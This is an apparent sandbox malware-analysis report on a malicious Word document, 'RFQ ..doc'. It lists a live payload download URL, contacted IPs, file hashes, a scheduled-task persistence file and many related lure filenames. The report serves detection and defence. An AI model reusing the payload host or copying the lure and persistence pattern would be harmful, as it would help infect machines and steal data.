                                    http://www.e-szigno.hu/RootCA.crt0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.sk.ee/cps/0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.e-szigno.hu/SZSZ/0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.quovadis.bm0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.%s.comPArghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2106018219.000000000D0B0000.00000002.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352051934.0000000005E20000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        low
                                        http://ZAGYny.comrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://ocsp.entrust.net0Drghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097214520.000000000287D000.00000004.00000001.sdmpfalse
                                          high
                                          https://secure.comodo.com/CPS0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                                            high
                                            https://www.netlock.net/docsrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziprghbyjuyktyjrthbgvfsfhytrrgfsd.exefalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://servername/isapibackend.dllrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354978003.0000000008720000.00000002.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://crl.entrust.net/2048ca.crl0rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.e-trust.be/CPS/QNcertsrghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown

                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
203.167.7.88 | rotronics.com.ph | Philippines | 32613 | IWEB-ASCA | true
198.54.122.60 | mail.privateemail.com | United States | 22612 | NAMECHEAP-NETUS | false

                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 385437
Start date: 12.04.2021
Start time: 14:22:06
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 9s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: RFQ ..doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winDOC@9/14@9/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 1.4% (good quality ratio 1.2%)
• Quality average: 56.9%
• Quality standard deviation: 27%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209, 93.184.221.240
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

Time | Type | Description
14:22:37 | API Interceptor | 267x Sleep call for process: EQNEDT32.EXE modified
14:22:39 | API Interceptor | 1297x Sleep call for process: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe modified
14:22:44 | API Interceptor | 3x Sleep call for process: schtasks.exe modified

                                              Joe Sandbox View / Context

                                              IPs

Match | Associated Sample Name / URL | Detection | Context
203.167.7.88 | 01_Enquiry Form.doc | malicious
• rotronics.com.ph/docxxx/ff/XnBbf3QlBZhvoNc.exe
198.54.122.60 | SecuriteInfo.com.Trojan.PackedNET.645.19369.exe | malicious
198.54.122.60 | 01_Enquiry Form.doc | malicious
198.54.122.60 | Quotation2001100200.PDF.exe | malicious
198.54.122.60 | Tepic.exe | malicious
198.54.122.60 | 3.exe | malicious
198.54.122.60 | New#PO23000.PDF.exe | malicious
198.54.122.60 | l1I6IIUtw7.exe | malicious
198.54.122.60 | dCaIlsd8Iu.exe | malicious
198.54.122.60 | QzieSGrrIc.exe | malicious
198.54.122.60 | 6ptKQe0Bf8.exe | malicious
198.54.122.60 | P.O.exe | malicious
198.54.122.60 | POM-20120273.PDF.exe | malicious
198.54.122.60 | Purchase_order_pdf.exe | malicious
198.54.122.60 | purchase_order_pdf.exe | malicious
198.54.122.60 | Purchase_order_pdf.exe | malicious
198.54.122.60 | Order_BC012356PDF.exe | malicious
198.54.122.60 | PAYMENT ADVICE.pdf.exe | malicious
198.54.122.60 | RFQ 4917 21-006-AA.doc | malicious
198.54.122.60 | Pump_Motor-TENDER SPECIFICATION.doc | malicious
198.54.122.60 | Purchase Order_3006164.doc | malicious

                                                                                      Domains

Match | Associated Sample Name / URL | Detection | Context
rotronics.com.ph | 01_Enquiry Form.doc | malicious
• 203.167.7.88
mail.privateemail.com | SecuriteInfo.com.Trojan.PackedNET.645.19369.exe | malicious
• 198.54.122.60
mail.privateemail.com | 01_Enquiry Form.doc | malicious
• 198.54.122.60
mail.privateemail.com | Quotation2001100200.PDF.exe | malicious
• 198.54.122.60
mail.privateemail.com | Tepic.exe | malicious
• 198.54.122.60
mail.privateemail.com | 3.exe | malicious
• 198.54.122.60
mail.privateemail.com | New#PO23000.PDF.exe | malicious
• 198.54.122.60
mail.privateemail.com | l1I6IIUtw7.exe | malicious
• 198.54.122.60
mail.privateemail.com | dCaIlsd8Iu.exe | malicious
• 198.54.122.60
mail.privateemail.com | QzieSGrrIc.exe | malicious
• 198.54.122.60
mail.privateemail.com | 6ptKQe0Bf8.exe | malicious
• 198.54.122.60
mail.privateemail.com | P.O.exe | malicious
• 198.54.122.60
mail.privateemail.com | POM-20120273.PDF.exe | malicious
• 198.54.122.60
mail.privateemail.com | Purchase_order_pdf.exe | malicious
• 198.54.122.60
mail.privateemail.com | purchase_order_pdf.exe | malicious
• 198.54.122.60
mail.privateemail.com | Purchase_order_pdf.exe | malicious
• 198.54.122.60
mail.privateemail.com | Order_BC012356PDF.exe | malicious
• 198.54.122.60
mail.privateemail.com | PAYMENT ADVICE.pdf.exe | malicious
• 198.54.122.60
mail.privateemail.com | RFQ 4917 21-006-AA.doc | malicious
• 198.54.122.60
mail.privateemail.com | Pump_Motor-TENDER SPECIFICATION.doc | malicious
• 198.54.122.60
mail.privateemail.com | Purchase Order_3006164.doc | malicious
• 198.54.122.60

                                                                                      ASN

Match | Associated Sample Name / URL | Detection | Context
IWEB-ASCA | 01_Enquiry Form.doc | malicious
• 203.167.7.88
IWEB-ASCA | EW098765432.exe | malicious
• 67.205.103.71
IWEB-ASCA | HE094355434.exe | malicious
• 67.205.103.71
IWEB-ASCA | AS897635632.exe | malicious
• 67.205.103.71
IWEB-ASCA | TR09454487654.exe | malicious
• 67.205.103.71
IWEB-ASCA | 2hDwjaGEBM.apk | malicious
• 174.142.95.82
IWEB-ASCA | NmAECL9373.apk | malicious
• 174.142.95.82
IWEB-ASCA | 2hDwjaGEBM.apk | malicious
• 174.142.95.82
IWEB-ASCA | Payment 9.10000 USD.exe | malicious
• 107.161.71.196
IWEB-ASCA | Invoice 76221 Secured_Pdf_brianc@johnstoncompanies.com.html | malicious
• 64.15.147.113
IWEB-ASCA | PO.xls | malicious
• 174.142.89.59
IWEB-ASCA | Io8ic2291n.doc | malicious
• 192.175.111.212
IWEB-ASCA | code_128_#Ud3f0#Ud2b8(grdoi).js | malicious
• 184.107.179.26
IWEB-ASCA | code_128_#U255e#U2219#U255e#U00ab(ma).js | malicious
• 184.107.179.26
IWEB-ASCA | code_128_#Ud3f0#Ud2b8(grdoi).js | malicious
• 184.107.179.26
IWEB-ASCA | code_128_#U255e#U2219#U255e#U00ab(ma).js | malicious
• 184.107.179.26
IWEB-ASCA | code_128_#U255e#U2219#U255e#U00ab(ma).js | malicious
• 184.107.179.26
IWEB-ASCA | code_128_#U255e#U2219#U255e#U00ab(ma).js | malicious
• 184.107.179.26
IWEB-ASCA | import_export_agency_agreement_template.js | malicious
• 184.107.179.26
IWEB-ASCA | WlYx12M7DM.exe | malicious
• 108.163.130.184
NAMECHEAP-NETUS | SecuriteInfo.com.Trojan.PackedNET.645.19369.exe | malicious
• 198.54.122.60
NAMECHEAP-NETUS | Bank Details.xlsx | malicious
• 198.54.117.212
NAMECHEAP-NETUS | Import shipment.exe | malicious
• 198.54.126.165
NAMECHEAP-NETUS | 01_Enquiry Form.doc | malicious
• 198.54.122.60
                                                                                      g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                                      • 198.54.126.105
                                                                                      8Pd6TOKQOf.exeGet hashmaliciousBrowse
                                                                                      • 199.193.7.228
                                                                                      Quotation2001100200.PDF.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60
                                                                                      remittance info.xlsxGet hashmaliciousBrowse
                                                                                      • 198.54.117.215
                                                                                      SOA.exeGet hashmaliciousBrowse
                                                                                      • 162.0.229.227
                                                                                      Swift002.exeGet hashmaliciousBrowse
                                                                                      • 198.54.117.211
                                                                                      winlog.exeGet hashmaliciousBrowse
                                                                                      • 198.54.117.217
                                                                                      2021-Quotation.xlsxGet hashmaliciousBrowse
                                                                                      • 199.193.7.228
                                                                                      36ne6xnkop.exeGet hashmaliciousBrowse
                                                                                      • 198.54.126.105
                                                                                      1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                                                      • 198.54.126.105
                                                                                      Dridex.xlsGet hashmaliciousBrowse
                                                                                      • 198.54.114.131
                                                                                      Remittance Advice (1).xlsGet hashmaliciousBrowse
                                                                                      • 198.54.114.220
                                                                                      Remittance Advice (1).xlsGet hashmaliciousBrowse
                                                                                      • 198.54.114.220
                                                                                      Remittance Advice (1).xlsGet hashmaliciousBrowse
                                                                                      • 198.54.114.220
                                                                                      giATspz5dw.exeGet hashmaliciousBrowse
                                                                                      • 104.219.248.15
                                                                                      Tepic.exeGet hashmaliciousBrowse
                                                                                      • 198.54.122.60

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                      Process:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                      Category:dropped
                                                                                      Size (bytes):58596
                                                                                      Entropy (8bit):7.995478615012125
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                      MD5:61A03D15CF62612F50B74867090DBE79
                                                                                      SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                      SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                      SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                      Process:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):326
                                                                                      Entropy (8bit):3.1025948057493555
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kKf0Sg3cwTJ6YN+SkQlPlEGYRMY9z+4KlDA3RUe0ht:n093cwTJ6HkPlE99SNxAhUe0ht
                                                                                      MD5:C0318F93B5712C946DDB9438135B66D8
                                                                                      SHA1:CD4AAE66D5EE525736AC807D321E120B0E065FF5
                                                                                      SHA-256:E9178E3724C9651A8A4248C85C43F5CC3F78630787403B1127F66E80D8289C15
                                                                                      SHA-512:BCB332A96DC765F20BEF467DDD50C8C1CC39D577F20DF32A1C1B4BBA8D2D3546E902DF67CA8E8BF7E442D6740E30C254F349AAA8BFE7CFFC909230461CAC5326
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: p...... .........`.../..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:downloaded
                                                                                      Size (bytes):733184
                                                                                      Entropy (8bit):7.923340773570457
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:XYMEBDhUzj786IMeIZfFtSyn7CY65s7/k6oHi8UiX67zeAIIHCiUzAnPAG6XecA8:XYMiGJIMBttSyW7sw6tf/cWCiuOPA9eA
                                                                                      MD5:F5F1E2A3E5DCE186EED0352350911887
                                                                                      SHA1:62F0FBF33E6E78AB4A7D7196763CC3DCE62C6A4E
                                                                                      SHA-256:8A3F4202E9F89C018F5C05B15C67898E51DC4D41AD368ABB871E044458F7822D
                                                                                      SHA-512:EFEB10F4406CFD4C553C3546A112744DBAE611CF995E243592C3047562D734B929DA2F3F34BDC029270BF2B4FA93452FAF1E70A1DE68451BC24F917A8F484018
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Reputation:low
                                                                                      IE Cache URL:http://rotronics.com.ph/docxxx/dec/ZhIOjFmINIXbKXm.exe
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P......L......>.... ... ....@.. ....................................@.....................................O.... ...H........................................................................... ............... ..H............text...D.... ...................... ..`.rsrc....H... ...J..................@..@.reloc..............................@..B................ .......H.......$}...v..........<................................................0............(....( .........(.....o!....*.....................("......(#......($......(%......(&....*N..(....o....('....*&..((....*.s)........s*........s+........s,........s-........*....0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+..*.0......
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73207C3D-FA20-48C4-87C4-17800DB89026}.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.05390218305374581
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EC948C2F-5218-4A38-A66D-F6FECB16C1E9}.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):1.404960705675577
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:OgwBPsgwBPcHdwBPsgwBPp+NNgREqAWlgFJJ1Dlll8vlwjbFwQFrB:OXpsXpcGpsXpmk5uFJJ17uvq/KQZB
                                                                                      MD5:B0AC9A9F74EEBC6FD46C9298256C1184
                                                                                      SHA1:59397E8AC2F9153EBF8057C75A93C0E360C25906
                                                                                      SHA-256:0ED6C085966028181133CFBEBFA28DACF50F805FFA4B754063E6C38331E36641
                                                                                      SHA-512:495D72BCE95702A7748E2C7FDA0E4FC984C709A0252E29DA28D587C55C3627A4B4907C8CA5EABB7288A36C48846BB7D0BAC722D20B6AF212FD022B3863C0C64A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: _.0.5.0.8.5.7.9.8.0.2.2.3.2.0.5.0.8.5.7.9.8.0.2.2.3.2. . . . . . . . . . . . . . . . . . . . . . . . . . . . ._.0.5.0.8.5.7.9.8.0.2.2.3.2.0.5.0.8.5.7.9.8.0.2.2.3.2.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .j-..d...CJ..OJ..QJ..U..^J..aJ.
                                                                                      C:\Users\user\AppData\Local\Temp\CabCA24.tmp
                                                                                      Process:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                      Category:dropped
                                                                                      Size (bytes):58596
                                                                                      Entropy (8bit):7.995478615012125
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                      MD5:61A03D15CF62612F50B74867090DBE79
                                                                                      SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                      SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                      SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                      C:\Users\user\AppData\Local\Temp\TarCA25.tmp
                                                                                      Process:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):152788
                                                                                      Entropy (8bit):6.309740459389463
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                                                      MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                                                      SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                                                      SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                                                      SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                      C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp
                                                                                      Process:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1625
                                                                                      Entropy (8bit):5.159845804541944
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBWtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3C
                                                                                      MD5:175CA2B026C4BC23F57A67426218C6C5
                                                                                      SHA1:E78F633E9D9CD722F1B1F4B0F351DBC9FA5BA919
                                                                                      SHA-256:9982E1EA7AADBD612FFE084EE85F7C51402A44DB9455AE196B722CD7493B0D5F
                                                                                      SHA-512:AD7BA0978725661C6E101C7224BFBD7B82887A37FE04D911B181E148E3EEACABA4FF5164A203DC0F50BA140345B1DBBB1AB9BD075830EC9B38D7CA3C927D4642
                                                                                      Malicious:true
                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFQ ..LNK
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:18 2020, mtime=Wed Aug 26 14:08:18 2020, atime=Mon Apr 12 20:22:35 2021, length=762054, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1970
                                                                                      Entropy (8bit):4.523449369323646
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:8bVan/XTm6GreVuGULge+ODv3qTadM7dD2bVan/XTm6GreVuGULge+ODv3qTadMj:8bVC/XTFGq44VOQh2bVC/XTFGq44VOQ/
                                                                                      MD5:B231CA8C40641C1CB28222F015C77D93
                                                                                      SHA1:B036AECB37FEF052304F56009CA7679E169E6B3E
                                                                                      SHA-256:D0389794C56D0E9778E76B8189C5E62247D31D112F562D6CB12025D7B6898F29
